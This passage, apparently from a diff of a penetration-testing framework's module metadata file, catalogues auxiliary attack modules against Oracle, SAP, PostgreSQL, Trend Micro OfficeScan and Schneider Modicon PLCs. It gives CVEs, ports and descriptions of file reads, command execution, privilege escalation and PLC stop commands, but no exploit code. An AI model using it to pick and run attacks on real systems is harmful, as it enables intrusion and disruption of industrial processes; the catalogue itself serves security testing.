- "fullname": "auxiliary/admin/officescan/tmlisten_traversal", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Anshul Pandey ", - "aushack " - ], - "description": "This module tests for directory traversal vulnerability in the UpdateAgent\n function in the OfficeScanNT Listener (TmListen.exe) service in Trend Micro\n OfficeScan. This allows remote attackers to read arbitrary files as SYSTEM\n via dot dot sequences in an HTTP request.", - "references": [ - "OSVDB-48730", - "CVE-2008-2439", - "BID-31531", - "URL-http://www.trendmicro.com/ftp/documentation/readme/OSCE_7.3_Win_EN_CriticalPatch_B1372_Readme.txt" - ], - "platform": "", - "arch": "", - "rport": 26122, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2017-11-09 03:00:24 +0000", - "path": "/modules/auxiliary/admin/officescan/tmlisten_traversal.rb", - "is_install_path": true, - "ref_name": "admin/officescan/tmlisten_traversal", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/oracle/ora_ntlm_stealer": { - "name": "Oracle SMB Relay Code Execution", - "fullname": "auxiliary/admin/oracle/ora_ntlm_stealer", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-04-07", - "type": "auxiliary", - "author": [ - "Sh2kerr " - ], - "description": "This module will help you to get Administrator access to OS using an unprivileged\n Oracle database user (you need only CONNECT and RESOURCE privileges).\n To do this you must firstly run smb_sniffer or smb_relay module on your sever.\n Then you must connect to Oracle database and run this module Ora_NTLM_stealer.rb\n which will connect to your SMB sever with credentials of Oracle RDBMS.\n So if smb_relay is working, you will get Administrator access to server 
which\n runs Oracle. If not than you can decrypt HALFLM hash.", - "references": [ - "URL-http://dsecrg.com/pages/pub/show.php?id=17" - ], - "platform": "", - "arch": "", - "rport": 1521, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb", - "is_install_path": true, - "ref_name": "admin/oracle/ora_ntlm_stealer", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/oracle/oracle_index_privesc": { - "name": "Oracle DB Privilege Escalation via Function-Based Index", - "fullname": "auxiliary/admin/oracle/oracle_index_privesc", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-01-21", - "type": "auxiliary", - "author": [ - "David Litchfield", - "Moshe Kaplan" - ], - "description": "This module will escalate an Oracle DB user to DBA by creating a\n function-based index on a table owned by a more-privileged user.\n Credits to David Litchfield for publishing the technique.", - "references": [ - "URL-http://www.davidlitchfield.com/Privilege_Escalation_via_Oracle_Indexes.pdf" - ], - "platform": "", - "arch": "", - "rport": 1521, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/admin/oracle/oracle_index_privesc.rb", - "is_install_path": true, - "ref_name": "admin/oracle/oracle_index_privesc", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/oracle/oracle_login": { - "name": "Oracle Account Discovery", - "fullname": "auxiliary/admin/oracle/oracle_login", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-11-20", - "type": "auxiliary", - "author": [ - "MC " - ], - "description": "This module 
uses a list of well known default authentication credentials\n to discover easily guessed accounts.", - "references": [ - "URL-http://www.petefinnigan.com/default/oracle_default_passwords.csv", - "URL-https://seclists.org/fulldisclosure/2009/Oct/261" - ], - "platform": "", - "arch": "", - "rport": 1521, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/admin/oracle/oracle_login.rb", - "is_install_path": true, - "ref_name": "admin/oracle/oracle_login", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/oracle/oracle_sql": { - "name": "Oracle SQL Generic Query", - "fullname": "auxiliary/admin/oracle/oracle_sql", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-12-07", - "type": "auxiliary", - "author": [ - "MC " - ], - "description": "This module allows for simple SQL statements to be executed\n against an Oracle instance given the appropriate credentials\n and sid.", - "references": [ - "URL-http://web.archive.org/web/20110322124810/http://www.metasploit.com:80/users/mc/" - ], - "platform": "", - "arch": "", - "rport": 1521, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/auxiliary/admin/oracle/oracle_sql.rb", - "is_install_path": true, - "ref_name": "admin/oracle/oracle_sql", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/oracle/oraenum": { - "name": "Oracle Database Enumeration", - "fullname": "auxiliary/admin/oracle/oraenum", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Carlos Perez " - ], - "description": "This module provides a simple way to scan an Oracle 
database server\n for configuration parameters that may be useful during a penetration\n test. Valid database credentials must be provided for this module to\n run.", - "references": [], - "platform": "", - "arch": "", - "rport": 1521, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/oracle/oraenum.rb", - "is_install_path": true, - "ref_name": "admin/oracle/oraenum", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/oracle/osb_execqr": { - "name": "Oracle Secure Backup exec_qr() Command Injection Vulnerability", - "fullname": "auxiliary/admin/oracle/osb_execqr", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-01-14", - "type": "auxiliary", - "author": [ - "MC " - ], - "description": "This module exploits a command injection vulnerability in Oracle Secure Backup version 10.1.0.3 to 10.2.0.2.", - "references": [ - "CVE-2008-5448", - "OSVDB-51342", - "URL-http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html", - "ZDI-09-003" - ], - "platform": "", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/admin/oracle/osb_execqr.rb", - "is_install_path": true, - "ref_name": "admin/oracle/osb_execqr", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/oracle/osb_execqr2": { - "name": "Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability", - "fullname": "auxiliary/admin/oracle/osb_execqr2", - "aliases": [], - "rank": 300, - "disclosure_date": 
"2009-08-18", - "type": "auxiliary", - "author": [ - "MC " - ], - "description": "This module exploits an authentication bypass vulnerability\n in login.php in order to execute arbitrary code via a command injection\n vulnerability in property_box.php. This module was tested\n against Oracle Secure Backup version 10.3.0.1.0 (Win32).", - "references": [ - "CVE-2009-1977", - "OSVDB-55903", - "CVE-2009-1978", - "OSVDB-55904", - "ZDI-09-058", - "ZDI-09-059" - ], - "platform": "", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/admin/oracle/osb_execqr2.rb", - "is_install_path": true, - "ref_name": "admin/oracle/osb_execqr2", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/oracle/osb_execqr3": { - "name": "Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability", - "fullname": "auxiliary/admin/oracle/osb_execqr3", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-07-13", - "type": "auxiliary", - "author": [ - "MC " - ], - "description": "This module exploits an authentication bypass vulnerability\n in login.php in order to execute arbitrary code via a command injection\n vulnerability in property_box.php. 
This module was tested\n against Oracle Secure Backup version 10.3.0.1.0 (Win32).", - "references": [ - "CVE-2010-0904", - "OSVDB-66338", - "ZDI-10-118" - ], - "platform": "", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/admin/oracle/osb_execqr3.rb", - "is_install_path": true, - "ref_name": "admin/oracle/osb_execqr3", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/oracle/post_exploitation/win32exec": { - "name": "Oracle Java execCommand (Win32)", - "fullname": "auxiliary/admin/oracle/post_exploitation/win32exec", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-12-07", - "type": "auxiliary", - "author": [ - "MC " - ], - "description": "This module will create a java class which enables the execution of OS commands.", - "references": [ - "URL-http://web.archive.org/web/20110322124810/http://www.metasploit.com:80/users/mc/" - ], - "platform": "", - "arch": "", - "rport": 1521, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb", - "is_install_path": true, - "ref_name": "admin/oracle/post_exploitation/win32exec", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/oracle/post_exploitation/win32upload": { - "name": "Oracle URL Download", - "fullname": "auxiliary/admin/oracle/post_exploitation/win32upload", - "aliases": [], - "rank": 300, - "disclosure_date": "2005-02-10", - "type": "auxiliary", - "author": [ - "CG " - ], - "description": "This 
module will create a java class which enables the download\n of a binary from a webserver to the oracle filesystem.", - "references": [ - "URL-http://www.argeniss.com/research/oraclesqlinj.zip" - ], - "platform": "", - "arch": "", - "rport": 1521, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb", - "is_install_path": true, - "ref_name": "admin/oracle/post_exploitation/win32upload", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/oracle/sid_brute": { - "name": "Oracle TNS Listener SID Brute Forcer", - "fullname": "auxiliary/admin/oracle/sid_brute", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-01-07", - "type": "auxiliary", - "author": [ - "MC " - ], - "description": "This module simply attempts to discover the protected SID.", - "references": [ - "URL-http://web.archive.org/web/20110322124810/http://www.metasploit.com:80/users/mc/", - "URL-http://www.red-database-security.com/scripts/sid.txt" - ], - "platform": "", - "arch": "", - "rport": 1521, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/auxiliary/admin/oracle/sid_brute.rb", - "is_install_path": true, - "ref_name": "admin/oracle/sid_brute", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/oracle/tnscmd": { - "name": "Oracle TNS Listener Command Issuer", - "fullname": "auxiliary/admin/oracle/tnscmd", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-02-01", - "type": "auxiliary", - "author": [ - "MC " - ], - "description": "This module allows for the sending of arbitrary TNS commands in order\n to gather 
information.\n Inspired from tnscmd.pl from www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd", - "references": [], - "platform": "", - "arch": "", - "rport": 1521, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/admin/oracle/tnscmd.rb", - "is_install_path": true, - "ref_name": "admin/oracle/tnscmd", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/pop2/uw_fileretrieval": { - "name": "UoW pop2d Remote File Retrieval Vulnerability", - "fullname": "auxiliary/admin/pop2/uw_fileretrieval", - "aliases": [], - "rank": 300, - "disclosure_date": "2000-07-14", - "type": "auxiliary", - "author": [ - "aushack " - ], - "description": "This module exploits a vulnerability in the FOLD command of the\n University of Washington ipop2d service. By specifying an arbitrary\n folder name it is possible to retrieve any file which is world or group\n readable by the user ID of the POP account. This vulnerability can only\n be exploited with a valid username and password. 
The From address is\n the file owner.", - "references": [ - "OSVDB-368", - "BID-1484" - ], - "platform": "", - "arch": "", - "rport": 109, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/admin/pop2/uw_fileretrieval.rb", - "is_install_path": true, - "ref_name": "admin/pop2/uw_fileretrieval", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/postgres/postgres_readfile": { - "name": "PostgreSQL Server Generic Query", - "fullname": "auxiliary/admin/postgres/postgres_readfile", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "todb " - ], - "description": "This module imports a file local on the PostgreSQL Server into a\n temporary table, reads it, and then drops the temporary table.\n It requires PostgreSQL credentials with table CREATE privileges\n as well as read privileges to the target file.", - "references": [], - "platform": "", - "arch": "", - "rport": 5432, - "autofilter_ports": [ - 5432 - ], - "autofilter_services": [ - "postgres" - ], - "targets": null, - "mod_time": "2024-02-19 10:57:53 +0000", - "path": "/modules/auxiliary/admin/postgres/postgres_readfile.rb", - "is_install_path": true, - "ref_name": "admin/postgres/postgres_readfile", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "postgresql" - ], - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/postgres/postgres_sql": { - "name": "PostgreSQL Server Generic Query", - "fullname": "auxiliary/admin/postgres/postgres_sql", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "todb " - ], - "description": "This module will allow for simple SQL statements to be executed against a\n PostgreSQL instance given the 
appropriate credentials.", - "references": [ - "URL-https://www.postgresql.org" - ], - "platform": "", - "arch": "", - "rport": 5432, - "autofilter_ports": [ - 5432 - ], - "autofilter_services": [ - "postgres" - ], - "targets": null, - "mod_time": "2024-03-05 17:49:13 +0000", - "path": "/modules/auxiliary/admin/postgres/postgres_sql.rb", - "is_install_path": true, - "ref_name": "admin/postgres/postgres_sql", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "postgresql" - ], - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/registry_security_descriptor": { - "name": "Windows Registry Security Descriptor Utility", - "fullname": "auxiliary/admin/registry_security_descriptor", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Christophe De La Fuente" - ], - "description": "Read or write a Windows registry security descriptor remotely.\n\n In READ mode, the `FILE` option can be set to specify where the\n security descriptor should be written to.\n\n The following format is used:\n ```\n key: \n security_info: \n sd: \n ```\n\n In WRITE mode, the `FILE` option can be used to specify the information\n needed to write the security descriptor to the remote registry. 
The file must\n follow the same format as described above.", - "references": [], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2024-12-16 14:55:10 +0000", - "path": "/modules/auxiliary/admin/registry_security_descriptor.rb", - "is_install_path": true, - "ref_name": "admin/registry_security_descriptor", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [ - "config-changes" - ] - }, - "session_types": [ - "smb" - ], - "needs_cleanup": false, - "actions": [ - { - "name": "READ", - "description": "Read a Windows registry security descriptor" - }, - { - "name": "WRITE", - "description": "Write a Windows registry security descriptor" - } - ] - }, - "auxiliary_admin/sap/cve_2020_6207_solman_rce": { - "name": "SAP Solution Manager remote unauthorized OS commands execution", - "fullname": "auxiliary/admin/sap/cve_2020_6207_solman_rce", - "aliases": [], - "rank": 300, - "disclosure_date": "2020-10-03", - "type": "auxiliary", - "author": [ - "Yvan Genuer", - "Pablo Artuso", - "Dmitry Chastuhin", - "Vladimir Ivanov" - ], - "description": "This module exploits the CVE-2020-6207 vulnerability within the SAP EEM servlet (tc~smd~agent~application~eem) of\n SAP Solution Manager (SolMan) running version 7.2. The vulnerability occurs due to missing authentication\n checks when submitting SOAP requests to the /EemAdminService/EemAdmin page to get information about connected SMDAgents,\n send HTTP request (SSRF), and execute OS commands on connected SMDAgent. 
Works stable in connected SMDAgent with Java version 1.8.\n\n Successful exploitation of the vulnerability enables unauthenticated remote attackers to achieve SSRF and execute OS commands from the agent connected\n to SolMan as a user from which the SMDAgent service starts, usually the daaadm.", - "references": [ - "CVE-2020-6207", - "URL-https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf", - "URL-https://github.com/chipik/SAP_EEM_CVE-2020-6207" - ], - "platform": "", - "arch": "", - "rport": 50000, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.rb", - "is_install_path": true, - "ref_name": "admin/sap/cve_2020_6207_solman_rce", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "config-changes", - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "EXEC", - "description": "Exec OS command on connected agent" - }, - { - "name": "LIST", - "description": "List connected agents" - }, - { - "name": "SECSTORE", - "description": "Get file with SolMan credentials from connected agent" - }, - { - "name": "SSRF", - "description": "Send SSRF from connected agent" - } - ] - }, - "auxiliary_admin/sap/cve_2020_6287_ws_add_user": { - "name": "SAP Unauthenticated WebService User Creation", - "fullname": "auxiliary/admin/sap/cve_2020_6287_ws_add_user", - "aliases": [], - "rank": 300, - "disclosure_date": "2020-07-14", - "type": "auxiliary", - "author": [ - "Pablo Artuso", - "Dmitry Chastuhin", - "Spencer McIntyre" - ], - "description": "This module leverages an unauthenticated web service to submit a job 
which will create a user with a specified\n role. The job involves running a wizard. After the necessary action is taken, the job is canceled to avoid\n unnecessary system changes.", - "references": [ - "CVE-2020-6287", - "URL-https://github.com/chipik/SAP_RECON", - "URL-https://www.onapsis.com/recon-sap-cyber-security-vulnerability", - "URL-https://us-cert.cisa.gov/ncas/alerts/aa20-195a" - ], - "platform": "", - "arch": "", - "rport": 50000, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.rb", - "is_install_path": true, - "ref_name": "admin/sap/cve_2020_6287_ws_add_user", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "AKA": [ - "RECON" - ], - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "config-changes", - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "ADD", - "description": "Add the specified user" - }, - { - "name": "REMOVE", - "description": "Remove the specified user" - } - ] - }, - "auxiliary_admin/sap/sap_configservlet_exec_noauth": { - "name": "SAP ConfigServlet OS Command Execution", - "fullname": "auxiliary/admin/sap/sap_configservlet_exec_noauth", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-11-01", - "type": "auxiliary", - "author": [ - "Dmitry Chastuhin", - "Andras Kabai" - ], - "description": "This module allows execution of operating system commands through the SAP\n ConfigServlet without any authentication.", - "references": [ - "OSVDB-92704", - "EDB-24963", - "URL-http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf" - ], - "platform": "", - "arch": "", - "rport": 50000, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 
3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb", - "is_install_path": true, - "ref_name": "admin/sap/sap_configservlet_exec_noauth", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/sap/sap_igs_xmlchart_xxe": { - "name": "SAP Internet Graphics Server (IGS) XMLCHART XXE", - "fullname": "auxiliary/admin/sap/sap_igs_xmlchart_xxe", - "aliases": [], - "rank": 300, - "disclosure_date": "2018-03-14", - "type": "auxiliary", - "author": [ - "Yvan Genuer", - "Vladimir Ivanov" - ], - "description": "This module exploits CVE-2018-2392 and CVE-2018-2393, two XXE vulnerabilities within the XMLCHART page\n of SAP Internet Graphics Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53. These\n vulnerabilities occur due to a lack of appropriate validation on the Extension HTML tag when\n submitting a POST request to the XMLCHART page to generate a new chart.\n\n Successful exploitation will allow unauthenticated remote attackers to read files from the server as the user\n from which the IGS service is started, which will typically be the SAP admin user. 
Alternatively attackers\n can also abuse the XXE vulnerability to conduct a denial of service attack against the vulnerable\n SAP IGS server.", - "references": [ - "CVE-2018-2392", - "CVE-2018-2393", - "URL-https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_IGS-The-vulnerable-forgotten-component.pdf" - ], - "platform": "", - "arch": "", - "rport": 40080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe.rb", - "is_install_path": true, - "ref_name": "admin/sap/sap_igs_xmlchart_xxe", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "DOS", - "description": "Denial Of Service" - }, - { - "name": "READ", - "description": "Remote file read" - } - ] - }, - "auxiliary_admin/sap/sap_mgmt_con_osexec": { - "name": "SAP Management Console OSExecute", - "fullname": "auxiliary/admin/sap/sap_mgmt_con_osexec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Chris John Riley" - ], - "description": "This module allows execution of operating system commands through the SAP\n Management Console SOAP Interface. 
A valid username and password must be\n provided.", - "references": [ - "URL-http://blog.c22.cc" - ], - "platform": "", - "arch": "", - "rport": 50013, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443, - 50013 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb", - "is_install_path": true, - "ref_name": "admin/sap/sap_mgmt_con_osexec", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/scada/advantech_webaccess_dbvisitor_sqli": { - "name": "Advantech WebAccess DBVisitor.dll ChartThemeConfig SQL Injection", - "fullname": "auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-04-08", - "type": "auxiliary", - "author": [ - "rgod ", - "juan vazquez " - ], - "description": "This module exploits a SQL injection vulnerability found in Advantech WebAccess 7.1. The\n vulnerability exists in the DBVisitor.dll component, and can be abused through malicious\n requests to the ChartThemeConfig web service. 
This module can be used to extract the site\n and project usernames and hashes.", - "references": [ - "CVE-2014-0763", - "ZDI-14-077", - "OSVDB-105572", - "BID-66740", - "URL-https://ics-cert.us-cert.gov/advisories/ICSA-14-079-03" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2020-09-22 02:56:51 +0000", - "path": "/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb", - "is_install_path": true, - "ref_name": "admin/scada/advantech_webaccess_dbvisitor_sqli", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/scada/ge_proficy_substitute_traversal": { - "name": "GE Proficy Cimplicity WebView substitute.bcl Directory Traversal", - "fullname": "auxiliary/admin/scada/ge_proficy_substitute_traversal", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-01-22", - "type": "auxiliary", - "author": [ - "Unknown", - "juan vazquez " - ], - "description": "This module abuses a directory traversal in GE Proficy Cimplicity, specifically on the\n gefebt.exe component used by the WebView, in order to retrieve arbitrary files with SYSTEM\n privileges. 
This module has been tested successfully on GE Proficy Cimplicity 7.5.", - "references": [ - "CVE-2013-0653", - "OSVDB-89490", - "BID-57505", - "URL-http://ics-cert.us-cert.gov/advisories/ICSA-13-022-02" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb", - "is_install_path": true, - "ref_name": "admin/scada/ge_proficy_substitute_traversal", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/scada/modicon_command": { - "name": "Schneider Modicon Remote START/STOP Command", - "fullname": "auxiliary/admin/scada/modicon_command", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-04-05", - "type": "auxiliary", - "author": [ - "K. Reid Wightman ", - "todb " - ], - "description": "The Schneider Modicon with Unity series of PLCs use Modbus function\n code 90 (0x5a) to perform administrative commands without authentication.\n This module allows a remote user to change the state of the PLC between\n STOP and RUN, allowing an attacker to end process control by the PLC.\n\n This module is based on the original 'modiconstop.rb' Basecamp module from\n DigitalBond.", - "references": [ - "URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/" - ], - "platform": "", - "arch": "", - "rport": 502, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/admin/scada/modicon_command.rb", - "is_install_path": true, - "ref_name": "admin/scada/modicon_command", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - 
"auxiliary_admin/scada/modicon_password_recovery": { - "name": "Schneider Modicon Quantum Password Recovery", - "fullname": "auxiliary/admin/scada/modicon_password_recovery", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-01-19", - "type": "auxiliary", - "author": [ - "K. Reid Wightman ", - "todb " - ], - "description": "The Schneider Modicon Quantum series of Ethernet cards store usernames and\n passwords for the system in files that may be retrieved via backdoor access.\n\n This module is based on the original 'modiconpass.rb' Basecamp module from\n DigitalBond.", - "references": [ - "URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/" - ], - "platform": "", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": null, - "mod_time": "2023-12-16 23:40:30 +0000", - "path": "/modules/auxiliary/admin/scada/modicon_password_recovery.rb", - "is_install_path": true, - "ref_name": "admin/scada/modicon_password_recovery", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/scada/modicon_stux_transfer": { - "name": "Schneider Modicon Ladder Logic Upload/Download", - "fullname": "auxiliary/admin/scada/modicon_stux_transfer", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-04-05", - "type": "auxiliary", - "author": [ - "K. Reid Wightman ", - "todb " - ], - "description": "The Schneider Modicon with Unity series of PLCs use Modbus function\n code 90 (0x5a) to send and receive ladder logic. 
